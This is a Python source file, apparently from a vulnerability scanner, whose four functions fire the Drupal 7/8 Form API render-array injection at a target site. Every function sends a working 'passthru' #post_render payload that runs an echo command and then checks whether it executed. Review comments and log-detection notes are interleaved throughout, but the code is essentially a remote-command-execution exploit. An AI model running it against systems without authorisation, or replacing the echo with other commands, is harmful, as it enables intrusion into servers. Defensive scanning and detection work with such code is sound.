def isPwnAbleWithQ(host: str) -> bool | None:
    """Probe a Drupal 7 site, addressed through the ``?q=`` path parameter, for
    the Form API render-array injection and report whether it executed.

    Two requests are made: a POST to the ``user/password`` form carrying a
    ``name[#post_render][]`` render-array payload, then a POST to the
    ``file/ajax/name/#value/<form_build_id>`` callback that triggers it.  The
    result counts as positive only when the marker string appears in the
    second response *without* the literal ``echo`` command text, i.e. the
    command output was returned rather than the payload merely being
    reflected.

    Args:
        host: Base URL of the site.  The Drupal path is sent as the ``q``
            query parameter, so nothing is appended to ``host`` itself.

    Returns:
        ``True`` when the marker was executed; ``False`` when the first
        request raised or no ``form_build_id`` was found in the form.
        NOTE(review): when the form is found but the marker is not executed,
        control falls off the end and the function returns ``None`` — falsy,
        but not ``False``.

    Detection notes: the ``name[#post_render][]`` / ``passthru`` parameters
    and the ``file/ajax/name/#value/`` path are the indicators visible in
    web-server and WAF logs for this probe.
    """
    # Per-call marker from the project's helper; assumed to be unique and
    # free of regex metacharacters (it is used unescaped below) — not
    # visible here, confirm in ulti.genSignature.
    signature = ulti.genSignature()
    get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru',
                  'name[#type]': 'markup',
                  'name[#markup]': 'echo ' + signature}
    post_params = {'form_id': 'user_pass',
                   '_triggering_element_name': 'name'}
    try:
        # verify=False disables TLS certificate validation for this request.
        r = requests.post(host, data=post_params,
                          params=get_params, verify=False, timeout=20)
    except Exception as e:
        # Any transport error (DNS, connect, timeout, TLS) is swallowed and
        # reported as "not vulnerable"; the exception is discarded.
        # print e
        return False
    # The form_build_id hidden field identifies the cached form whose render
    # array now carries the payload.
    m = re.search(r'<input type="hidden" name="form_build_id"'
                  ' value="([^"]+)"', r.text)
    if m:
        found = m.group(1)
        get_params = {'q': 'file/ajax/name/#value/' + found}
        post_params = {'form_build_id': found}
        # NOTE(review): no timeout on this request (unlike the first), so an
        # unresponsive host can block the caller indefinitely; verify is
        # left at its default here, so a self-signed site that passed the
        # first request may fail this one.
        res = requests.post(host, data=post_params, params=get_params)
        # detect: marker present; n: the whole "echo <marker>" command text
        # is present, meaning the payload was reflected, not executed.
        detect = bool(re.search(signature, res.text))
        n = bool(re.search('echo ' + signature, res.text))
        if detect and not n:
            return True
    else:
        return False
def exploitD7Clean(host: str) -> bool:
    """Probe a Drupal 7 site using clean URLs (path in the URL, not ``?q=``)
    for the Form API render-array injection and report whether it executed.

    Same two-step sequence as ``isPwnAbleWithQ``: POST the payload to
    ``user/password``, extract ``form_build_id``, then POST to the
    ``file/ajax/name/%23value/<form_build_id>`` callback.  Positive only when
    the marker appears in the second response without the literal ``echo``
    command text.

    Args:
        host: Base URL of the site; a trailing ``/`` is added if missing so
            the paths can be concatenated.

    Returns:
        ``True`` when the marker was executed, ``False`` on a transport
        error, a missing ``form_build_id``, or a non-executing response.
        Every path returns a ``bool``.

    Detection notes: the ``name[#post_render][]`` / ``passthru`` parameters
    and the ``file/ajax/name/%23value/`` path are the log-visible indicators.
    """
    # Per-call marker from the project's helper; assumed unique and free of
    # regex metacharacters (used unescaped below) — confirm in
    # ulti.genSignature.
    signature = ulti.genSignature()
    # Normalise to a trailing slash so path concatenation below is valid.
    if(host[-1:] != '/'):
        host += '/'
    url = host + 'user/password'
    get_params = {'name[#post_render][]': 'passthru',
                  'name[#type]': 'markup',
                  'name[#markup]': 'echo ' + signature}
    post_params = {'form_id': 'user_pass',
                   '_triggering_element_name': 'name'}
    try:
        # verify=False disables TLS certificate validation.
        # NOTE(review): no timeout here, so a slow host blocks the caller.
        r = requests.post(url, data=post_params,
                          params=get_params, verify=False)
    except Exception as e:
        # Transport errors are swallowed and reported as "not vulnerable";
        # the exception object is discarded.
        # print e
        return False
    # form_build_id identifies the cached form carrying the payload.
    m = re.search(r'<input type="hidden" name="form_build_id"'
                  ' value="([^"]+)"', r.text)
    if m:
        found = m.group(1)
        # '#' is percent-encoded because it is part of the path here, not a
        # query parameter as in the ?q= variant.
        url = ''.join([host, 'file/ajax/name/%23value/', found])
        post_params = {'form_build_id': found}
        # post url, not host
        # NOTE(review): no timeout and default verify on this request, so
        # it may hang or fail TLS validation where the first request did not.
        res = requests.post(url, data=post_params)
        # detect: marker present; n: full "echo <marker>" text present, i.e.
        # the payload was reflected rather than executed.
        detect = bool(re.search(signature, res.text))
        n = bool(re.search('echo ' + signature, res.text))
        if detect and not n:
            return True
        else:
            return False
    else:
        return False
def exploitD8(host: str) -> bool:
    """Probe a Drupal 8 site for the Form API render-array injection via the
    user-registration AJAX endpoint and report whether it executed.

    A single POST is made to the URL produced by ``ulti.genURLD8(host)``
    with a ``mail[a][#post_render][]`` payload.  Positive only when the
    marker appears in the response without the literal ``echo`` command
    text.

    Args:
        host: Base URL of the site, passed through to ``ulti.genURLD8``
            (not visible here) to build the endpoint URL.

    Returns:
        ``True`` when the marker was executed, ``False`` on a transport
        error or a non-executing response.  Every path returns a ``bool``.

    Detection notes: the ``mail[a][#post_render][]`` / ``passthru`` form
    fields together with ``_drupal_ajax=1`` are the log-visible indicators.
    """
    # Per-call marker from the project's helper; assumed unique and free of
    # regex metacharacters (used unescaped below) — confirm in
    # ulti.genSignature.
    signature = ulti.genSignature()
    # Endpoint construction lives in the project helper; presumably the
    # user/register AJAX path (compare isPwnAble_2018) — verify there.
    url = ulti.genURLD8(host)
    post_params = {'form_id': 'user_register_form', '_drupal_ajax': '1',
                   'mail[a][#post_render][]': 'passthru',
                   'mail[a][#type]': 'markup',
                   'mail[a][#markup]': 'echo ' + signature}
    try:
        # verify=False disables TLS certificate validation; the 50 s timeout
        # is far more generous than the other probes in this file.
        res = requests.post(url, data=post_params, verify=False, timeout=50)
    except Exception as e:
        # Transport errors are swallowed and reported as "not vulnerable";
        # the exception object is discarded.
        # print e
        return False
    # detect: marker present; n: full "echo <marker>" text present, i.e. the
    # payload was reflected rather than executed.
    detect = bool(re.search(signature, res.text))
    n = bool(re.search('echo ' + signature, res.text))
    if detect and not n:
        return True
    else:
        return False
def isPwnAble_2018(host: str, version: str, headers) -> bool | None:
    """Version-dispatching probe for the Drupal Form API render-array
    injection, with caller-supplied HTTP headers and a 1 s timeout.

    Only the first character of ``version`` is inspected: ``'7'`` runs the
    two-step ``?q=`` sequence (``user/password`` form, then the
    ``file/ajax/name/#value/<form_build_id>`` callback); ``'8'`` runs a
    single POST to the ``user/register`` AJAX endpoint.

    Args:
        host: Base URL of the site.  For the ``'8'`` branch the path is
            concatenated directly, so ``host`` is expected to end with ``/``
            (no normalisation is done here, unlike ``exploitD7Clean``).
        version: Drupal major version string; only ``version[:1]`` is used.
        headers: Extra request headers passed straight to ``requests.post``
            — presumably a dict of header name to value; confirm at the
            caller.

    Returns:
        ``True`` when the marker is found, ``False`` on a transport error, a
        missing ``form_build_id`` (7) or no marker (8).  NOTE(review): two
        paths fall off the end and return ``None``: a ``version`` that is
        neither ``'7'`` nor ``'8'``, and the 7-branch case where the form was
        found but the marker was not.

    Unlike the other probes in this file, the 7 branch does not check for the
    reflected ``echo <marker>`` text, so a response that merely echoes the
    payload back also counts as positive.  The 1 s timeout makes false
    negatives likely on slow hosts.

    Detection notes: the ``#post_render`` / ``passthru`` parameters,
    ``_triggering_element_name=name``, the ``file/ajax/name/#value/`` path
    (7) and ``element_parents=account/mail/%23value`` with ``ajax_form=1``
    (8) are the log-visible indicators.
    """
    # Per-call marker from the project's helper; assumed unique and free of
    # regex metacharacters (used unescaped below) — confirm in
    # ulti.genSignature.
    signature = ulti.genSignature()
    # Reduce e.g. "7.58" to "7"; anything other than '7'/'8' matches no
    # branch and the function returns None.
    version = version[:1]
    if version == '7':
        # Note the leading space in ' echo ' — differs from the other probes.
        get_params = {
            'q': 'user/password',
            'name[#post_render][]': 'passthru',
            'name[#type]': 'markup',
            'name[#markup]': ' echo ' + signature
        }
        post_params = {
            'form_id': 'user_pass',
            '_triggering_element_name': 'name'
        }
        try:
            # verify=False disables TLS certificate validation.
            r = requests.post(host,
                              data=post_params,
                              params=get_params,
                              verify=False,
                              headers=headers,
                              timeout=1)
        except:
            # Bare except: swallows everything, including KeyboardInterrupt,
            # and reports "not vulnerable".
            return False
        # form_build_id identifies the cached form carrying the payload.
        m = re.search(
            r'<input type="hidden" name="form_build_id"'
            ' value="([^"]+)"', r.text)
        if m:
            found = m.group(1)
            get_params = {'q': 'file/ajax/name/#value/' + found}
            post_params = {'form_build_id': found}
            # NOTE(review): this request is outside the try and uses default
            # verify, so a timeout or TLS error here raises to the caller
            # instead of returning False.
            res = requests.post(host,
                                data=post_params,
                                params=get_params,
                                headers=headers,
                                timeout=1)
            # Marker presence only — no reflection check, see docstring.
            detect = bool(re.search(signature, res.text))
            if detect:
                return True
        else:
            return False
    if version == '8':
        # Path appended without a separator; relies on host ending in '/'.
        host = ''.join([
            host, 'user/register?element_parents=account/mail/%23',
            'value&ajax_form=1&_wrapper_format=drupal_ajax'
        ])
        post_params = {
            'form_id': 'user_register_form',
            '_drupal_ajax': '1',
            'mail[a][#post_render][]': 'passthru',
            'mail[a][#type]': 'markup',
            'mail[a][#markup]': ' echo ' + signature
        }
        try:
            # verify=False disables TLS certificate validation.
            r = requests.post(host,
                              data=post_params,
                              verify=False,
                              headers=headers,
                              timeout=1)
        except:
            # Bare except: swallows everything and reports "not vulnerable".
            return False

        # Marker presence only — a reflected payload also counts here.
        m = bool(re.search(signature, r.text))
        if m:
            return True
        else:
            return False